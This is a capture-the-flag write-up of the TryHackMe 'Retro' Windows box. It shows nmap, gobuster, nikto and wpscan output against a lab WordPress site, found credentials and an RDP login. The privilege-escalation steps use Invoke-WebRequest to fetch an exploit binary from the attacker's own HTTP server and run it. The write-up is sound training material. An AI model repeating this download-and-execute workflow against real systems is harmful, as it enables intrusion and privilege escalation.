👀
WriteUps
  • WHOAMI
  • Try Hack Me - THM
    • Linux Boxes
      • Simple CTF
      • Basic Pentesting
      • Kenobi
      • TomGhost
      • Game Zone
      • Skynet
      • Daily Bugle
      • Dogcat
      • Anonymous
      • Wonderland
      • Blog
      • HaskHell
    • Windows Boxes
      • Blue
      • Alfred
      • HackPark
      • Retro
    • Windows Rooms
      • Windows Exploitation
        • Intro to Windows
        • Windows Fundamentals 1
        • Windows Fundamentals 2
      • Active Directory
        • Active Directory Basics
    • Privilege Escalation Rooms
      • Linux
        • Linux PrivEsc
        • Common Linux Privesc
      • Windows
        • Windows PrivEsc
    • Crypto Rooms
      • Hashing - Crypto 101
      • Encryption - Crypto 101
    • Web Rooms
      • OWASP Top 10
        • 1. Injection
        • 2. Broken Authentication
        • 3. Sensitive Data Exposure
        • 4. XML External Entity
        • 5. Broken Access Control
        • 6. Security Misconfiguration
        • 7. Cross-site Scripting
        • 8. Insecure Deserialization
        • 9. Components with Known Vulnerabilities
        • 10. Insufficent Logging & Monitoring
    • MISC
      • Tools
        • John The Ripper
        • Metasploit
      • Git Happens
      • What the Shell?
  • HACK THE BOX - HTB
    • Linux Boxes
      • CAP
      • KNIFE
      • BOUNTYHUNTER
      • PREVISE
      • DYNSTR
      • PIT
      • SEAL
  • VulnHub
    • KIOPTRIX Series
      • KIOPTRIX Level 1 (#1)
      • KIOPTRIX Level 1.1 (#2)
      • KIOPTRIX Level 1.2 (#3)
      • KIOPTRIX Level 1.3 (#4)
    • Privilege Escalation
      • Escalate Linux
      • Escalate My Privilege
    • MISC
      • Misdirection
      • TOPPO
      • NULLBYTE
Powered by GitBook
On this page
  • Scanning
  • Nmap
  • Recon
  • port 80
  • Initial Access
  • RDP connection
  • Privilege Escalation
  1. Try Hack Me - THM
  2. Windows Boxes

Retro

New high score!

Scanning

Nmap

nmap -F 10.10.163.171
​
Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-26 15:34 BST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.00% done; ETC: 15:35 (0:00:19 remaining)
Nmap scan report for ip-10-10-163-171.eu-west-1.compute.internal (10.10.163.171)
Host is up (0.00061s latency).
Not shown: 98 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
MAC Address: 02:80:9E:E4:33:A3 (Unknown)
​
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds

http and rdp running

Recon

port 80

dir busting

 gobuster dir -u http://10.10.2.49/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.2.49/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/09/26 16:47:14 Starting gobuster
===============================================================
/retro (Status: 301)
===============================================================
2021/09/26 16:47:18 Finished
===============================================================

nikto

nikto -host http://10.10.163.171/retro/
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.163.171
+ Target Hostname:    ip-10-10-163-171.eu-west-1.compute.internal
+ Target Port:        80
+ Start Time:         2021-09-26 15:28:33 (GMT1)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/10.0
+ Retrieved x-powered-by header: PHP/7.1.29
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'link' found, with contents: <http://localhost/retro/index.php/wp-json/>; rel="https://api.w.org/"
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
​

wpScan

wpscan --url http://10.10.163.171/retro/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
​
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.7
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
​
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://10.10.163.171/retro/ [10.10.163.171]
[+] Started: Sun Sep 26 15:30:07 2021
​
Interesting Finding(s):
​
[+] Headers
 | Interesting Entries:
 |  - Server: Microsoft-IIS/10.0
 |  - X-Powered-By: PHP/7.1.29
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
​
[+] XML-RPC seems to be enabled: http://10.10.163.171/retro/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
​
[+] WordPress readme found: http://10.10.163.171/retro/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
​
[+] The external WP-Cron seems to be enabled: http://10.10.163.171/retro/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299
​
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.163.171/retro/index.php/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
 |  - http://10.10.163.171/retro/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.1</generator>
​
[+] WordPress theme in use: 90s-retro
 | Location: http://10.10.163.171/retro/wp-content/themes/90s-retro/
 | Latest Version: 1.4.10 (up to date)
 | Last Updated: 2019-04-15T00:00:00.000Z
 | Readme: http://10.10.163.171/retro/wp-content/themes/90s-retro/readme.txt
 | Style URL: http://10.10.163.171/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1
 | Style Name: 90s Retro
 | Style URI: https://organicthemes.com/retro-theme/
 | Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
 | Author: Organic Themes
 | Author URI: https://organicthemes.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4.10 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.163.171/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1, Match: 'Version: 1.4.10'
​
[+] Enumerating All Plugins (via Passive Methods)
​
[i] No plugins Found.
​
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <======================================================================================================================================> (22 / 22) 100.00% Time: 00:00:00
​
[i] No Config Backups Found.
​
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
​
[+] Finished: Sun Sep 26 15:30:20 2021
[+] Requests Done: 51
[+] Cached Requests: 5
[+] Data Sent: 11.638 KB
[+] Data Received: 175.524 KB
[+] Memory used: 220.398 MB
[+] Elapsed time: 00:00:12

check directory /retro

after some enum i found this bath

credentials wade:parzival

Initial Access

RDP connection

Privilege Escalation

check build number using system info

this exploit works here

Steps

  • download zip file

  • extract it

  • setup http server python -m http.server

  • on target Invoke-WebRequest -urlcache -f -Uri [http://[your_ip/path_to_execuable] -OutFile [exeutable_name]

  • run it

PreviousHackParkNextWindows Rooms

Last updated 3 years ago